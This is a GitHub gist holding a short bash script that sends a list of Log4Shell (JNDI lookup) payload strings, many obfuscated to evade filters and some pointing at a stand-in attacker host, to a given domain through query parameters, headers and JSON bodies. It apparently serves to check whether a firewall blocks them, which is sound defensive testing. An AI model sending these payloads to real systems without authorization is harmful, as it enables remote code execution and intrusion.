Last active
December 15, 2021 14:08
-
-
Save johnhpatton/1ea7eec1ce588c60335c2e169cce8590 to your computer and use it in GitHub Desktop.
Tests log4shell patterns against an endpoint using curl
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
declare -a PATTERNS=() | |
PATTERNS+=('${jndi:ldap:attacker_controled_website/payload_to_be_executed}') | |
PATTERNS+=('${j${k8s:k5:-ND}i${sd:k5:-:}}') | |
PATTERNS+=('${j${main:\k5:-Nd}i${spring:k5:-:}}') | |
PATTERNS+=('${j${sys:k5:-nD}${lower:i${web:k5:-:}}}') | |
PATTERNS+=('${j${::-nD}i${::-:}}') | |
PATTERNS+=('${j${EnV:K5:-nD}i:}') | |
PATTERNS+=('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}attacker_controled_website/payload_to_be_executed}') | |
PATTERNS+=('${j${loWer:Nd}i${uPper::}}') | |
PATTERNS+=('${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker_controled_website/payload_to_be_executed }') | |
PATTERNS+=('${jndi:${lower:l}${lower:d}a${lower:p}://attacker_controled_website/payload_to_be_executed}') | |
PATTERNS+=('${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker_controled_website/payload_to_be_executed}') | |
PATTERNS+=('${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker_controled_website/payload_to_be_executed}') | |
PATTERNS+=('${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}attacker_controled_website/payload_to_be_executed}') | |
PATTERNS+=('${jndi:${lower:l}${lower:d}ap://attacker_controled_website/payload_to_be_executed}') | |
PATTERNS+=('${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://attacker_controled_website/payload_to_be_executed}') | |
PATTERNS+=('${${::-j}ndi:}') | |
PATTERNS+=('${${::-j}nd${::-i}:}') | |
PATTERNS+=('${${en${lower:v}:ENV_NAME:-j}}') | |
PATTERNS+=('${${lower:${upper:${lower:${upper:${lower:${upper:${lower:${upper:${lower:${upper:${lower:${upper:${lower:j}}}}}}}}}}}}}}') | |
[ -z "$1" ] && { echo "Usage: $0 {domain}"; exit 1; } | |
# None of these should be a positive response code | |
for p in "${PATTERNS[@]}"; do | |
echo "Testing request with: ${p}" | |
curl -skG -w '%{http_code}\n' --data-urlencode "productid=${p}" -o /dev/null https://$1/ | |
echo "Testing header with: ${p}" | |
curl -sk -w '%{http_code}\n' -H "X-Attack-Test: ${p}" -o /dev/null https://$1/ | |
echo "Testing request body with: ${p}" | |
curl -sk -w '%{http_code}\n\n' -d "{\"ProductID\": \"${p}\"}" -o /dev/null https://$1/ | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment